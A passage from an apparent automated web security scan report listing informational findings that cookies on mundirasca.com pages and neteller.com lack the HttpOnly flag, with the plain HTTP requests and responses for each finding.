<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.270. http://www.mundirasca.com/ContactUsTel.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36099


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.271. http://www.mundirasca.com/FAQ.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /FAQ.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.272. http://www.mundirasca.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.273. http://www.mundirasca.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36932


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.274. http://www.mundirasca.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.mundirasca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dvkvwu55wj1sbf3o2utk1m55; path=/; HttpOnly
Set-Cookie: CSI_17=EncryptedUniqueVisitorID=65E5179F214E218C7690B36C8457FF60&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=mundirasca.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: UniqueVisitorID=65E5179F214E218C7690B36C8457FF60; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Vary: Accept-Encoding
Content-Length: 37105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.275. http://www.mundirasca.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.276. http://www.mundirasca.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.277. http://www.mundirasca.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.278. http://www.mundirasca.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.279. http://www.mundirasca.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.280. http://www.mundirasca.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 104767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.281. http://www.mundirasca.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35543


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.282. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /click/MundiRasca.com/SPA/Home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/MundiRasca.com/SPA/Home/ HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.283. http://www.neteller.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neteller.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.neteller.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 16 May 2011 12:13:10 GMT
Location: https://www.neteller.com/
Connection: close
Set-Cookie: X-Mapping-gbooldlg=3B765357B0213B9F4C30F843CD444976;path=/
Content-Length: 209

